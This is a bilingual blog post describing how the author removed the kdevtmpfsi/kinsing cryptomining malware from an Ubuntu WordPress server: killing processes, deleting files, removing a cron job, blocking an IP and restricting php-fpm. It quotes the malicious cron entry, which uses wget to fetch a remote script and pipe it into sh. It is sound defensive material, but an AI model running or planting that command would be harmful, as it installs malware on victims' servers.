发布于

How to Fix the kdevtmpfsi and kinsing Mining Virus Infection on an Ubuntu Server

My server is running Ubuntu 24. Today, after installing and configuring a WordPress blog based on Nginx 1.24, PHP 8.3, and MySQL 8.0, I ran the following command to check the server load:

$ top -i

I noticed that the kdevtmpfsi process was using 100% of the CPU. A quick search revealed that this is a malicious mining process. Typically, two malicious mining processes—kdevtmpfsi and kinsing—are found together. Here’s how I resolved the issue:

Step 1: Kill the kdevtmpfsi and kinsing Processes

First, find the process ID (PID) for kdevtmpfsi and kill it:

$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9

Next, find the PID for kinsing and kill it:

$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9

Step 2: Find and Remove the Malicious Program Files

Now, search for and remove any files associated with kdevtmpfsi and kinsing:

$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;

The output should look like this:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Step 3: Check for Scheduled Tasks Set by www-data User

The top -i command showed that the user running the kdevtmpfsi process was www-data, so I checked the scheduled tasks for this user:

$ sudo crontab -l -u www-data

I found the following task:

* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

This cron job downloads and executes the unk.sh script, which in turn downloads and runs the kdevtmpfsi and kinsing programs. To remove this scheduled task, I ran:

$ sudo crontab -r -u www-data

Then, I deleted the unk.sh script:

$ sudo find / -iname unk.sh -exec rm -fv {} \;

Step 4: Create Non-Executable Placeholder Files for kdevtmpfsi and kinsing

To prevent the kdevtmpfsi and kinsing files from being executed again, I created them as non-executable placeholder files and set them to read-only:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

This ensures that these files are no longer executable and cannot run.

Step 5: Enable UFW Firewall and Block Malicious IP

I enabled the UFW firewall and blocked access from the IP address 185.122.204.197, which was being used for the malicious downloads:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

To check the UFW status:

$ sudo ufw status numbered

Step 6: Restrict PHP-FPM to Localhost

According to online resources, this issue is likely due to the php-fpm service exposing port 9000 to the internet. To fix this, I edited the php-fpm configuration file:

$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf

I changed the following line:

listen = 9000

to:

listen = 127.0.0.1:9000

This restricts php-fpm to only listen on the local 127.0.0.1 IP address. To apply the changes, I restarted the php-fpm service:

$ sudo systemctl restart php8.3-fpm

Reference:

发布于

Ubuntu服务器感染了挖矿病毒程序kdevtmpfsi和kinsing的解决方法

我的服务器的操作系统是Ubuntu 24。今天安装并配置了Wordpress博客,基于Nginx 1.24 + PHP 8.3 + MySQL 8.0。我运行以下命令查看服务器负载:
$ top -i
发现kdevtmpfsi进程CPU使用率达到100%。网上查了一下,说它是恶意的挖矿进程。一般同时存在两个恶意的挖矿进程:kdevtmpfsi和kinsing。解决步骤如下。

第一步,查找kdevtmpfsi进程的id并杀死:
$ ps aux | grep kdevtmpfsi | awk '{print $2}' | xargs sudo kill -9
查找kinsing进程的id并杀死:
$ ps aux | grep kinsing | awk '{print $2}' | xargs sudo kill -9

第二步,使用以下命令查找并删除kdevtmpfsi和kinsing进程对应的程序文件:

$ sudo find / -iname kdevtmpfsi* -exec rm -fv {} \;
$ sudo find / -iname kinsing* -exec rm -fv {} \;

输出应如下所示:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

第三步,top -i命令显示运行kdevtmpfsi进程的用户是www-data用户,因此查看www-data用户设置的计划任务:

$ sudo crontab -l -u www-data
* * * * * wget -q -O - http://185.122.204.197/unk.sh | sh > /dev/null 2>&1

果然有,这个计划任务的功能是每隔一定时间就下载并运行unk.sh脚本程序,这个脚本程序会下载kdevtmpfsi和kinsing程序并启动运行。删除www-data用户的计划任务:
$ sudo crontab -r -u www-data
删除unk.sh脚本文件:
$ sudo find / -iname unk.sh -exec rm -fv {} \;

第四步,创建自己的kdevtmpfsi和kinsing文件并将其设置为只读:

$ touch /tmp/kdevtmpfsi && touch /tmp/kinsing
$ echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
$ echo "kinsing is fine now" > /tmp/kinsing
$ chmod 0444 /tmp/kdevtmpfsi
$ chmod 0444 /tmp/kinsing

这么做后kdevtmpfsi和kinsing文件就不是可执行程序了,就无法运行起来了。

第五步,启动UFW防火墙并禁止185.122.204.197这个IP对我当前的服务器的访问:

$ sudo ufw allow ssh
$ sudo ufw enable
$ sudo ufw allow http
$ sudo ufw allow https
$ sudo ufw deny from 185.122.204.197

查看UFW状态:
$ sudo ufw status numbered

根据网上的资料,这个问题很可能是php-fpm服务暴露9000端口到互联网引起的,因此修改php-fpm配置文件:
$ sudo vim /etc/php/8.3/fpm/pool.d/www.conf
把以下这行:
listen = 9000
改为:
listen = 127.0.0.1:9000
意思是php-fpm服务只监听本机127.0.0.1这个IP地址。重启php-fpm服务使配置文件的修改生效:
$ sudo systemctl restart php8.3-fpm

参考
https://stackoverflow.com/questions/60151640/kdevtmpfsi-using-the-entire-cpu